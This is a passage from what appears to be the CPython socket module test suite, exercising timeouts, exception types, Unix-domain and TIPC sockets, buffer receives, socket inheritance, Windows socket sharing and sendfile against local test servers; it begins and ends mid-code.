        # Server side, shared by both tests: accept, wait 3 seconds,
        # then send a short reply.
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        time.sleep(3)
        conn.send(b"done!")
    testOutsideTimeout = testInsideTimeout

    def _testInsideTimeout(self):
        # No timeout: the client blocks until the delayed reply arrives.
        self.cli = sock = socket.create_connection((HOST, self.port))
        data = sock.recv(5)
        self.assertEqual(data, b"done!")

    def _testOutsideTimeout(self):
        # 1 s timeout < 3 s server delay, so recv() must time out.
        self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
        self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
    """Timeout semantics of accept() on a listening TCP socket."""

    def testTCPTimeout(self):
        # accept() with a finite timeout and no incoming connection must
        # raise socket.timeout.
        def raise_timeout(*args, **kwargs):
            self.serv.settimeout(1.0)
            self.serv.accept()
        self.assertRaises(socket.timeout, raise_timeout,
                          "Error generating a timeout exception (TCP)")

    def testTimeoutZero(self):
        # A zero timeout is non-blocking mode: accept() with nothing
        # pending must raise a plain OSError, not socket.timeout.
        # NOTE: the except clauses are order-sensitive because
        # socket.timeout is a subclass of OSError.
        ok = False
        try:
            self.serv.settimeout(0.0)
            foo = self.serv.accept()
        except socket.timeout:
            self.fail("caught timeout instead of error (TCP)")
        except OSError:
            ok = True
        except:
            self.fail("caught unexpected exception (TCP)")
        if not ok:
            self.fail("accept() returned success when we did not expect it")

    @unittest.skipUnless(hasattr(signal, 'alarm'),
                         'test needs signal.alarm()')
    def testInterruptedTimeout(self):
        # A signal arriving while accept() waits on a socket with a
        # timeout must surface as the handler's exception, not as
        # socket.timeout.
        # XXX I don't know how to do this test on MSWindows or any other
        # platform that doesn't support signal.alarm() or os.kill(), though
        # the bug should have existed on all platforms.
        self.serv.settimeout(5.0)   # must be longer than alarm

        class Alarm(Exception):
            pass

        def alarm_handler(signal, frame):
            raise Alarm

        old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
        try:
            try:
                signal.alarm(2)    # POSIX allows alarm to be up to 1 second early
                foo = self.serv.accept()
            except socket.timeout:
                self.fail("caught timeout instead of Alarm")
            except Alarm:
                pass
            except:
                self.fail("caught other exception instead of Alarm:"
                          " %s(%s):\n%s" %
                          (sys.exc_info()[:2] + (traceback.format_exc(),)))
            else:
                self.fail("nothing caught")
            finally:
                signal.alarm(0)         # shut off alarm
        except Alarm:
            self.fail("got Alarm in wrong place")
        finally:
            # no alarm can be pending.  Safe to restore old handler.
            signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
    """Timeout semantics of recv() on a UDP socket."""

    def testUDPTimeout(self):
        # recv() with a finite timeout and no incoming datagram must
        # raise socket.timeout.
        def raise_timeout(*args, **kwargs):
            self.serv.settimeout(1.0)
            self.serv.recv(1024)
        self.assertRaises(socket.timeout, raise_timeout,
                          "Error generating a timeout exception (UDP)")

    def testTimeoutZero(self):
        # A zero timeout is non-blocking mode: recv() with nothing
        # pending must raise a plain OSError, not socket.timeout.
        # NOTE: the except clauses are order-sensitive because
        # socket.timeout is a subclass of OSError.
        ok = False
        try:
            self.serv.settimeout(0.0)
            foo = self.serv.recv(1024)
        except socket.timeout:
            self.fail("caught timeout instead of error (UDP)")
        except OSError:
            ok = True
        except:
            self.fail("caught unexpected exception (UDP)")
        if not ok:
            self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
    """Sanity checks on the socket exception hierarchy and on operating
    on a socket whose underlying descriptor is gone."""

    def testExceptionTree(self):
        # Every socket error type must ultimately derive from OSError.
        for derived, base in ((OSError, Exception),
                              (socket.herror, OSError),
                              (socket.gaierror, OSError),
                              (socket.timeout, OSError)):
            self.assertTrue(issubclass(derived, base))

    def test_setblocking_invalidfd(self):
        # Regression test for issue #28471
        donor = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        wrapper = socket.socket(
            socket.AF_INET, socket.SOCK_STREAM, 0, donor.fileno())
        donor.close()
        self.addCleanup(wrapper.detach)
        # The shared descriptor was closed through the donor socket, so
        # any operation on the wrapper must now fail.
        with self.assertRaises(OSError):
            wrapper.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
    """AF_UNIX sockets bound in the Linux abstract namespace, i.e. names
    starting with a NUL byte that never touch the filesystem."""

    # Size of sockaddr_un.sun_path on Linux.
    UNIX_PATH_MAX = 108

    def testLinuxAbstractNamespace(self):
        address = b"\x00python-test-hello\x00\xff"
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as server:
            server.bind(address)
            server.listen()
            with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as client:
                client.connect(server.getsockname())
                with server.accept()[0] as accepted:
                    self.assertEqual(server.getsockname(), address)
                    self.assertEqual(client.getpeername(), address)

    def testMaxName(self):
        # A name of exactly UNIX_PATH_MAX bytes (leading NUL included)
        # still fits.
        longest = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
            sock.bind(longest)
            self.assertEqual(sock.getsockname(), longest)

    def testNameOverflow(self):
        # One byte past the limit must be rejected.
        too_long = "\x00" + "h" * self.UNIX_PATH_MAX
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
            self.assertRaises(OSError, sock.bind, too_long)

    def testStrName(self):
        # Check that an abstract name can be passed as a string.
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            sock.bind("\x00python\x00test\x00")
            self.assertEqual(sock.getsockname(), b"\x00python\x00test\x00")
        finally:
            sock.close()

    def testBytearrayName(self):
        # Check that an abstract name can be passed as a bytearray.
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
            sock.bind(bytearray(b"\x00python\x00test\x00"))
            self.assertEqual(sock.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
    """Binding AF_UNIX sockets to filesystem pathnames, including
    non-ASCII and unencodable names."""

    def setUp(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)

    def tearDown(self):
        self.sock.close()

    def encoded(self, path):
        # Return the given path encoded in the file system encoding,
        # or skip the test if this is not possible.
        try:
            return os.fsencode(path)
        except UnicodeEncodeError:
            self.skipTest(
                "Pathname {0!a} cannot be represented in file "
                "system encoding {1!r}".format(
                    path, sys.getfilesystemencoding()))

    def bind(self, sock, path):
        # Bind the socket
        try:
            support.bind_unix_socket(sock, path)
        except OSError as e:
            # Skip (rather than fail) when the temp-dir path exceeds the
            # platform's sun_path limit.
            if str(e) == "AF_UNIX path too long":
                self.skipTest(
                    "Pathname {0!a} is too long to serve as an AF_UNIX path"
                    .format(path))
            else:
                raise

    def testUnbound(self):
        # Issue #30205 (note getsockname() can return None on OS X)
        self.assertIn(self.sock.getsockname(), ('', None))

    def testStrAddr(self):
        # Test binding to and retrieving a normal string pathname.
        path = os.path.abspath(support.TESTFN)
        self.bind(self.sock, path)
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    def testBytesAddr(self):
        # Test binding to a bytes pathname.
        path = os.path.abspath(support.TESTFN)
        self.bind(self.sock, self.encoded(path))
        self.addCleanup(support.unlink, path)
        # getsockname() reports the str form even for a bytes bind.
        self.assertEqual(self.sock.getsockname(), path)

    def testSurrogateescapeBind(self):
        # Test binding to a valid non-ASCII pathname, with the
        # non-ASCII bytes supplied using surrogateescape encoding.
        path = os.path.abspath(support.TESTFN_UNICODE)
        b = self.encoded(path)
        self.bind(self.sock, b.decode("ascii", "surrogateescape"))
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)

    def testUnencodableAddr(self):
        # Test binding to a pathname that cannot be encoded in the
        # file system encoding.
        if support.TESTFN_UNENCODABLE is None:
            self.skipTest("No unencodable filename available")
        path = os.path.abspath(support.TESTFN_UNENCODABLE)
        self.bind(self.sock, path)
        self.addCleanup(support.unlink, path)
        self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
    """
    Test the buffer versions of socket.recv() and socket.send().
    """
    # The server-side test* methods receive into various writable buffer
    # types; the client-side _test* methods (run in a second thread by
    # the ThreadableTest machinery) send MSG.  Several client halves are
    # shared via plain attribute aliasing.

    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)

    def testRecvIntoArray(self):
        buf = array.array("B", [0] * len(MSG))
        nbytes = self.cli_conn.recv_into(buf)
        self.assertEqual(nbytes, len(MSG))
        buf = buf.tobytes()
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    def _testRecvIntoArray(self):
        buf = bytes(MSG)
        self.serv_conn.send(buf)

    def testRecvIntoBytearray(self):
        buf = bytearray(1024)
        nbytes = self.cli_conn.recv_into(buf)
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvIntoBytearray = _testRecvIntoArray

    def testRecvIntoMemoryview(self):
        buf = bytearray(1024)
        nbytes = self.cli_conn.recv_into(memoryview(buf))
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvIntoMemoryview = _testRecvIntoArray

    def testRecvFromIntoArray(self):
        buf = array.array("B", [0] * len(MSG))
        nbytes, addr = self.cli_conn.recvfrom_into(buf)
        self.assertEqual(nbytes, len(MSG))
        buf = buf.tobytes()
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)

    def _testRecvFromIntoArray(self):
        buf = bytes(MSG)
        self.serv_conn.send(buf)

    def testRecvFromIntoBytearray(self):
        buf = bytearray(1024)
        nbytes, addr = self.cli_conn.recvfrom_into(buf)
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvFromIntoBytearray = _testRecvFromIntoArray

    def testRecvFromIntoMemoryview(self):
        buf = bytearray(1024)
        nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
        self.assertEqual(nbytes, len(MSG))
        msg = buf[:len(MSG)]
        self.assertEqual(msg, MSG)
    _testRecvFromIntoMemoryview = _testRecvFromIntoArray

    def testRecvFromIntoSmallBuffer(self):
        # See issue #20246: a size argument larger than the buffer must
        # be rejected instead of overrunning the buffer.
        buf = bytearray(8)
        self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)

    def _testRecvFromIntoSmallBuffer(self):
        self.serv_conn.send(MSG)

    def testRecvFromIntoEmptyBuffer(self):
        # recvfrom_into() must accept an empty buffer, with and without
        # an explicit zero size.
        buf = bytearray()
        self.cli_conn.recvfrom_into(buf)
        self.cli_conn.recvfrom_into(buf, 0)
    _testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
# Parameters shared by the TIPC tests below: the service type and the
# lower/upper bounds of the published name-sequence range.
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
    """Check if the TIPC module is loaded

    The TIPC module is not loaded automatically on Ubuntu and probably
    other Linux distros.
    """
    if not hasattr(socket, "AF_TIPC"):
        return False
    try:
        modules = open("/proc/modules")
    except (FileNotFoundError, IsADirectoryError, PermissionError):
        # It's ok if the file does not exist, is a directory or if we
        # have not the permission to read it.
        return False
    with modules:
        return any(line.startswith("tipc ") for line in modules)
@unittest.skipUnless(isTipcAvailable(),
                     "TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
    """Connectionless (SOCK_RDM) messaging over AF_TIPC."""

    def testRDM(self):
        srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
        cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
        self.addCleanup(srv.close)
        self.addCleanup(cli.close)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Publish a TIPC name sequence covering [TIPC_LOWER, TIPC_UPPER].
        srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
                TIPC_LOWER, TIPC_UPPER)
        srv.bind(srvaddr)
        # Send to a single name in the middle of the published range.
        sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
                TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
        cli.sendto(MSG, sendaddr)
        msg, recvaddr = srv.recvfrom(1024)
        self.assertEqual(cli.getsockname(), recvaddr)
        self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
                     "TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
    """Connection-oriented (SOCK_STREAM) messaging over AF_TIPC; the
    client half runs in a second thread via ThreadableTest."""

    def __init__(self, methodName = 'runTest'):
        unittest.TestCase.__init__(self, methodName = methodName)
        ThreadableTest.__init__(self)

    def setUp(self):
        self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
        self.addCleanup(self.srv.close)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
                TIPC_LOWER, TIPC_UPPER)
        self.srv.bind(srvaddr)
        self.srv.listen()
        # Unblock the client thread before we block in accept().
        self.serverExplicitReady()
        self.conn, self.connaddr = self.srv.accept()
        self.addCleanup(self.conn.close)

    def clientSetUp(self):
        # There is a hittable race between serverExplicitReady() and the
        # accept() call; sleep a little while to avoid it, otherwise
        # we could get an exception
        time.sleep(0.1)
        self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
        self.addCleanup(self.cli.close)
        # Connect to a name in the middle of the published range.
        addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
                TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
        self.cli.connect(addr)
        self.cliaddr = self.cli.getsockname()

    def testStream(self):
        msg = self.conn.recv(1024)
        self.assertEqual(msg, MSG)
        self.assertEqual(self.cliaddr, self.connaddr)

    def _testStream(self):
        self.cli.send(MSG)
        self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
    """Socket objects as context managers: leaving the with block closes
    the socket, even after an explicit close() or after an exception."""

    def _testSocketClass(self):
        # base test
        with socket.socket() as sock:
            self.assertFalse(sock._closed)
        self.assertTrue(sock._closed)
        # close inside with block
        with socket.socket() as sock:
            sock.close()
        self.assertTrue(sock._closed)
        # exception inside with block
        with socket.socket() as sock:
            self.assertRaises(OSError, sock.sendall, b'foo')
        self.assertTrue(sock._closed)

    def testCreateConnectionBase(self):
        # Server side: echo a single chunk back to the client.
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        data = conn.recv(1024)
        conn.sendall(data)

    def _testCreateConnectionBase(self):
        address = self.serv.getsockname()
        with socket.create_connection(address) as sock:
            self.assertFalse(sock._closed)
            sock.sendall(b'foo')
            self.assertEqual(sock.recv(1024), b'foo')
        self.assertTrue(sock._closed)

    def testCreateConnectionClose(self):
        # Server side: echo a single chunk back to the client.
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        data = conn.recv(1024)
        conn.sendall(data)

    def _testCreateConnectionClose(self):
        address = self.serv.getsockname()
        with socket.create_connection(address) as sock:
            sock.close()
        self.assertTrue(sock._closed)
        # Using a closed socket must fail.
        self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
    """Verify sockets are non-inheritable by default and that the
    inheritable flag can be inspected and toggled, both through the
    socket API and directly through the fd's FD_CLOEXEC flag."""

    @unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
                         "SOCK_CLOEXEC not defined")
    @support.requires_linux_version(2, 6, 28)
    def test_SOCK_CLOEXEC(self):
        cloexec_type = socket.SOCK_STREAM | socket.SOCK_CLOEXEC
        with socket.socket(socket.AF_INET, cloexec_type) as sock:
            # The CLOEXEC bit is stripped from the reported type.
            self.assertEqual(sock.type, socket.SOCK_STREAM)
            self.assertFalse(sock.get_inheritable())

    def test_default_inheritable(self):
        with socket.socket() as sock:
            self.assertEqual(sock.get_inheritable(), False)

    def test_dup(self):
        original = socket.socket()
        with original:
            duplicate = original.dup()
            original.close()
            # The duplicate is non-inheritable too, and survives closing
            # the socket it was duplicated from.
            with duplicate:
                self.assertEqual(duplicate.get_inheritable(), False)

    def test_set_inheritable(self):
        with socket.socket() as sock:
            sock.set_inheritable(True)
            self.assertEqual(sock.get_inheritable(), True)
            sock.set_inheritable(False)
            self.assertEqual(sock.get_inheritable(), False)

    @unittest.skipIf(fcntl is None, "need fcntl")
    def test_get_inheritable_cloexec(self):
        with socket.socket() as sock:
            fd = sock.fileno()
            self.assertEqual(sock.get_inheritable(), False)
            # Clearing FD_CLOEXEC behind the socket's back must be
            # reflected by get_inheritable().
            flags = fcntl.fcntl(fd, fcntl.F_GETFD)
            fcntl.fcntl(fd, fcntl.F_SETFD, flags & ~fcntl.FD_CLOEXEC)
            self.assertEqual(sock.get_inheritable(), True)

    @unittest.skipIf(fcntl is None, "need fcntl")
    def test_set_inheritable_cloexec(self):
        with socket.socket() as sock:
            fd = sock.fileno()
            # Non-inheritable means FD_CLOEXEC is set on the fd...
            self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
                             fcntl.FD_CLOEXEC)
            # ...and making it inheritable clears the flag.
            sock.set_inheritable(True)
            self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
                             0)

    def test_socketpair(self):
        left, right = socket.socketpair()
        self.addCleanup(left.close)
        self.addCleanup(right.close)
        self.assertEqual(left.get_inheritable(), False)
        self.assertEqual(right.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
                     "SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
    """Interplay of SOCK_NONBLOCK, setblocking(), settimeout() and the
    global default timeout with the reported type/timeout/blocking state."""

    def checkNonblock(self, s, nonblock=True, timeout=0.0):
        # Assert that socket s is (or is not) non-blocking, and that its
        # timeout and fd-level O_NONBLOCK flag agree with that state.
        if nonblock:
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertEqual(s.gettimeout(), timeout)
            self.assertTrue(
                fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
            if timeout == 0:
                # timeout == 0: means that getblocking() must be False.
                self.assertFalse(s.getblocking())
            else:
                # If timeout > 0, the socket will be in a "blocking" mode
                # from the standpoint of the Python API.  For Python socket
                # object, "blocking" means that operations like 'sock.recv()'
                # will block.  Internally, file descriptors for
                # "blocking" Python sockets *with timeouts* are in a
                # *non-blocking* mode, and 'sock.recv()' uses 'select()'
                # and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
                self.assertTrue(s.getblocking())
        else:
            self.assertEqual(s.type, socket.SOCK_STREAM)
            self.assertEqual(s.gettimeout(), None)
            self.assertFalse(
                fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
            self.assertTrue(s.getblocking())

    @support.requires_linux_version(2, 6, 28)
    def test_SOCK_NONBLOCK(self):
        # a lot of it seems silly and redundant, but I wanted to test that
        # changing back and forth worked ok
        with socket.socket(socket.AF_INET,
                           socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
            self.checkNonblock(s)
            s.setblocking(1)
            self.checkNonblock(s, nonblock=False)
            s.setblocking(0)
            self.checkNonblock(s)
            s.settimeout(None)
            self.checkNonblock(s, nonblock=False)
            s.settimeout(2.0)
            self.checkNonblock(s, timeout=2.0)
            s.setblocking(1)
            self.checkNonblock(s, nonblock=False)
        # defaulttimeout: new sockets inherit the module-global default.
        t = socket.getdefaulttimeout()
        socket.setdefaulttimeout(0.0)
        with socket.socket() as s:
            self.checkNonblock(s)
        socket.setdefaulttimeout(None)
        with socket.socket() as s:
            self.checkNonblock(s, False)
        socket.setdefaulttimeout(2.0)
        with socket.socket() as s:
            self.checkNonblock(s, timeout=2.0)
        socket.setdefaulttimeout(None)
        with socket.socket() as s:
            self.checkNonblock(s, False)
        # Restore whatever default was in effect before the test.
        socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
    """Windows-only tests for socket.share() / socket.fromshare(), which
    duplicate a socket into another process."""

    # This must be classmethod and not staticmethod or multiprocessing
    # won't be able to bootstrap it.
    @classmethod
    def remoteProcessServer(cls, q):
        # Recreate socket from shared data
        sdata = q.get()
        message = q.get()
        s = socket.fromshare(sdata)
        s2, c = s.accept()
        # Send the message
        s2.sendall(message)
        s2.close()
        s.close()

    def testShare(self):
        # Transfer the listening server socket to another process
        # and service it from there.
        # Create process:
        q = multiprocessing.Queue()
        p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
        p.start()
        # Get the shared socket data
        data = self.serv.share(p.pid)
        # Pass the shared socket to the other process
        addr = self.serv.getsockname()
        self.serv.close()
        q.put(data)
        # The data that the server will send us
        message = b"slapmahfro"
        q.put(message)
        # Connect
        s = socket.create_connection(addr)
        #  listen for the data
        m = []
        while True:
            data = s.recv(100)
            if not data:
                break
            m.append(data)
        s.close()
        received = b"".join(m)
        self.assertEqual(received, message)
        p.join()

    def testShareLength(self):
        # Truncated or padded share data must be rejected.
        data = self.serv.share(os.getpid())
        self.assertRaises(ValueError, socket.fromshare, data[:-1])
        self.assertRaises(ValueError, socket.fromshare, data+b"foo")

    def compareSockets(self, org, other):
        # socket sharing is expected to work only for blocking socket
        # since the internal python timeout value isn't transferred.
        self.assertEqual(org.gettimeout(), None)
        self.assertEqual(org.gettimeout(), other.gettimeout())
        self.assertEqual(org.family, other.family)
        self.assertEqual(org.type, other.type)
        # If the user specified "0" for proto, then
        # internally windows will have picked the correct value.
        # Python introspection on the socket however will still return
        # 0.  For the shared socket, the python value is recreated
        # from the actual value, so it may not compare correctly.
        if org.proto != 0:
            self.assertEqual(org.proto, other.proto)

    def testShareLocal(self):
        # Round-trip a share through the current process.
        data = self.serv.share(os.getpid())
        s = socket.fromshare(data)
        try:
            self.compareSockets(self.serv, s)
        finally:
            s.close()

    def testTypes(self):
        # Every supported family/type combination must survive sharing.
        families = [socket.AF_INET, socket.AF_INET6]
        types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
        for f in families:
            for t in types:
                try:
                    source = socket.socket(f, t)
                except OSError:
                    continue  # This combination is not supported
                try:
                    data = source.share(os.getpid())
                    shared = socket.fromshare(data)
                    try:
                        self.compareSockets(source, shared)
                    finally:
                        shared.close()
                finally:
                    source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
    """
    Test the send() implementation of socket.sendfile().
    """
    # Server-side test* methods accept the connection and verify the
    # received bytes; the matching client-side _test* methods (run in a
    # second thread by the ThreadableTest machinery) call sendfile().

    FILESIZE = (10 * 1024 * 1024)  # 10 MiB
    BUFSIZE = 8192
    FILEDATA = b""
    TIMEOUT = 2

    @classmethod
    def setUpClass(cls):
        # Create one FILESIZE test file of random ASCII letters for the
        # whole class, and keep its contents in cls.FILEDATA.
        def chunks(total, step):
            assert total >= step
            while total > step:
                yield step
                total -= step
            if total:
                yield total
        chunk = b"".join([random.choice(string.ascii_letters).encode()
                          for i in range(cls.BUFSIZE)])
        with open(support.TESTFN, 'wb') as f:
            # FILESIZE is an exact multiple of BUFSIZE, so writing a full
            # chunk per csize yields exactly FILESIZE bytes.
            for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
                f.write(chunk)
        with open(support.TESTFN, 'rb') as f:
            cls.FILEDATA = f.read()
            assert len(cls.FILEDATA) == cls.FILESIZE

    @classmethod
    def tearDownClass(cls):
        support.unlink(support.TESTFN)

    def accept_conn(self):
        # Accept one client connection with a short per-connection timeout.
        self.serv.settimeout(MAIN_TIMEOUT)
        conn, addr = self.serv.accept()
        conn.settimeout(self.TIMEOUT)
        self.addCleanup(conn.close)
        return conn

    def recv_data(self, conn):
        # Drain the connection until EOF and return everything received.
        received = []
        while True:
            chunk = conn.recv(self.BUFSIZE)
            if not chunk:
                break
            received.append(chunk)
        return b''.join(received)

    def meth_from_sock(self, sock):
        # Depending on the mixin class being run return either send()
        # or sendfile() method implementation.
        return getattr(sock, "_sendfile_use_send")

    # regular file

    def _testRegularFile(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, self.FILESIZE)
            self.assertEqual(file.tell(), self.FILESIZE)

    def testRegularFile(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # non regular file

    def _testNonRegularFile(self):
        address = self.serv.getsockname()
        file = io.BytesIO(self.FILEDATA)
        with socket.create_connection(address) as sock, file as file:
            sent = sock.sendfile(file)
            self.assertEqual(sent, self.FILESIZE)
            self.assertEqual(file.tell(), self.FILESIZE)
            # A BytesIO has no real fd, so the os.sendfile()-based path
            # must give up on it explicitly.
            self.assertRaises(socket._GiveupOnSendfile,
                              sock._sendfile_use_sendfile, file)

    def testNonRegularFile(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # empty file

    def _testEmptyFileSend(self):
        address = self.serv.getsockname()
        filename = support.TESTFN + "2"
        with open(filename, 'wb'):
            self.addCleanup(support.unlink, filename)
        file = open(filename, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, 0)
            self.assertEqual(file.tell(), 0)

    def testEmptyFileSend(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(data, b"")

    # offset

    def _testOffset(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file, offset=5000)
            self.assertEqual(sent, self.FILESIZE - 5000)
            self.assertEqual(file.tell(), self.FILESIZE)

    def testOffset(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE - 5000)
        self.assertEqual(data, self.FILEDATA[5000:])

    # count

    def _testCount(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 5000007
            meth = self.meth_from_sock(sock)
            sent = meth(file, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count)

    def testCount(self):
        count = 5000007
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[:count])

    # count small

    def _testCountSmall(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 1
            meth = self.meth_from_sock(sock)
            sent = meth(file, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count)

    def testCountSmall(self):
        count = 1
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[:count])

    # count + offset

    def _testCountWithOffset(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            count = 100007
            meth = self.meth_from_sock(sock)
            sent = meth(file, offset=2007, count=count)
            self.assertEqual(sent, count)
            self.assertEqual(file.tell(), count + 2007)

    def testCountWithOffset(self):
        count = 100007
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), count)
        self.assertEqual(data, self.FILEDATA[2007:count+2007])

    # non blocking sockets are not supposed to work

    def _testNonBlocking(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address) as sock, file as file:
            sock.setblocking(False)
            meth = self.meth_from_sock(sock)
            self.assertRaises(ValueError, meth, file)
            self.assertRaises(ValueError, sock.sendfile, file)

    def testNonBlocking(self):
        conn = self.accept_conn()
        if conn.recv(8192):
            self.fail('was not supposed to receive any data')

    # timeout (non-triggered)

    def _testWithTimeout(self):
        address = self.serv.getsockname()
        file = open(support.TESTFN, 'rb')
        with socket.create_connection(address, timeout=2) as sock, file as file:
            meth = self.meth_from_sock(sock)
            sent = meth(file)
            self.assertEqual(sent, self.FILESIZE)

    def testWithTimeout(self):
        conn = self.accept_conn()
        data = self.recv_data(conn)
        self.assertEqual(len(data), self.FILESIZE)
        self.assertEqual(data, self.FILEDATA)

    # timeout (triggered)

    def _testWithTimeoutTriggeredSend(self):
        address = self.serv.getsockname()
        with open(support.TESTFN, 'rb') as file:
            with socket.create_connection(address) as sock:
                sock.settimeout(0.01)
                meth = self.meth_from_sock(sock)
                self.assertRaises(socket.timeout, meth, file)

    def testWithTimeoutTriggeredSend(self):
        conn = self.accept_conn()
        # Read at most one chunk and then stop servicing the connection,
        # so the client's send buffer fills and its 0.01 s timeout fires.
        conn.recv(88192)

    # errors

    def _test_errors(self):
        pass

    def test_errors(self):
        # sendfile() argument validation: datagram sockets, text-mode
        # files, and non-positive-integer counts are all rejected.
        with open(support.TESTFN, 'rb') as file:
            with socket.socket(type=socket.SOCK_DGRAM) as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(
                    ValueError, "SOCK_STREAM", meth, file)
        with open(support.TESTFN, 'rt') as file:
            with socket.socket() as s:
                meth = self.meth_from_sock(s)
                self.assertRaisesRegex(
